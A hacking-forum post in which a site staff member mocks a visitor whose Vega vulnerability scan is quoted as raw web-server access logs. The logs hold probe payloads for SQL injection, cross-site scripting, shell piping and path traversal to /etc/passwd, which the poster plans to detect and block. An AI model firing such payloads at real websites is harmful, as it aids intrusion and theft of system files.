Wannabe Defacer (190.82.180.249)

No replies
RaT
RaT's picture
Offline
SX High Council
Joined: 2008/03/12

After going to https://www.soldierx.com//bbs/201301/Owning-and-Proud-Brave-Defacers-indeed, 190.82.180.249 hit us with some lame attacks (including a Vega scan).

Lulzy snippets follow:

190.82.180.249 - - [21/Jul/2013:22:24:03 -0400] "GET / HTTP/1.1" 200 11731 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:07 -0400] "GET / HTTP/1.1" 200 8259 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:12 -0400] "GET /nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /lpt9 HTTP/1.1" 404 3380 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /~nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:15 -0400] "GET /nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:17 -0400] "GET /?_test1=c:\\windows\\system32\\cmd.exe&_test2=/etc/passwd&_test3=|/bin/sh&_test4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>/no/such/file&_test6=<script>alert(1)</script>&_test7=javascript:alert(1) HTTP/1.1" 200 8164 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:17 -0400] "GET /?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw//&_test3=bhins//&_test4=CEEFLMORSTeeinnnosttx-*&_test5=cefhilnosu///&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1)Sad HTTP/1.1" 200 8052 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:20 -0400] "GET /sites/ HTTP/1.1" 403 820 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /modules/ HTTP/1.1" 403 965 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /misc/ HTTP/1.1" 403 965 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:20 -0400] "GET /news/ HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /https:/ HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /VIP-Only HTTP/1.1" 200 3682 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /blog HTTP/1.1" 200 9864 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /hdb HTTP/1.1" 200 5651 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /Forums/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /modules/nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /misc/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /sites/nosuchpage123 HTTP/1.1" 404 3541 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /user/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /frontpage HTTP/1.1" 301 789 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /sxlabs/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /quotes/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /rss.xml HTTP/1.1" 200 4501 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /users/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:22 -0400] "GET /bbs/ HTTP/1.1" 301 805 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:21 -0400] "GET /aggregator HTTP/1.1" 200 7123 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:24 -0400] "GET /news/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"

and

190.82.180.249 - - [21/Jul/2013:22:24:37 -0400] "GET /https:?_test1=c:\\windows\\system32\\cmd.exe&_test2=/etc/passwd&_test3=|/bin/sh&_test4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>/no/such/file&_test6=<script>alert(1)</script>&_test7=javascript:alert(1) HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:38 -0400] "GET /Forums/nosuchpage123 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:37 -0400] "GET /https:?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw//&_test3=bhins//&_test4=CEEFLMORSTeeinnnosttx-*&_test5=cefhilnosu///&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1)Sad HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:24:38 -0400] "GET /bbs/lpt9 HTTP/1.1" 404 3396 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:23 -0400] "GET /frontpage?page=5'\" HTTP/1.1" 301 660 "vega'\"" "vega'\""
190.82.180.249 - - [21/Jul/2013:22:25:23 -0400] "GET /frontpage?page=5\\\\'\\\\\" HTTP/1.1" 301 676 "vega\\\\'\\\\\"" "vega\\\\'\\\\\""
190.82.180.249 - - [21/Jul/2013:22:25:24 -0400] "GET /frontpage?page=5%200%200%20-%20- HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5\\'\\\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /frontpage?page=5\\'\\\" HTTP/1.1" 301 676 "vega\\'\\\"" "vega\\'\\\""
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /frontpage?page=5-0-0 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:24 -0400] "GET /frontpage?page=5%20-%200%20-%200 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:22 -0400] "GET /Neophytes-Guide-What-are-common-types-seen-hacking-communities HTTP/1.1" 200 4674 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5%20OR%201=1%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5'%20OR%201=2%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5\\\\'\\\\\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'%20OR%201%20=%201%20--%20 HTTP/1.1" 301 692 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:26 -0400] "GET /frontpage?page=5\"%20OR%201=1%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'\"'\"'\"'\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5''''\"\"\"\" HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5\"%20OR%201=2%20--%20 HTTP/1.1" 301 676 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5' HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:25 -0400] "GET /frontpage?page=5'\" HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:29 -0400] "GET /frontpage?page=/././5 HTTP/1.1" 301 821 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=...\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=./5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=.\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=.../5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=\\..\\5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/./5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:27 -0400] "GET /frontpage?page=5'' HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/../5 HTTP/1.1" 301 660 "-" "UserAgent"
190.82.180.249 - - [21/Jul/2013:22:25:28 -0400] "GET /frontpage?page=/../../../../../../../../../../../etc/passwd%005 HTTP/1.1" 301 724 "-" "UserAgent"

Anyways, thanks lamer. You've given us some new strings to detect/block on Laughing out loud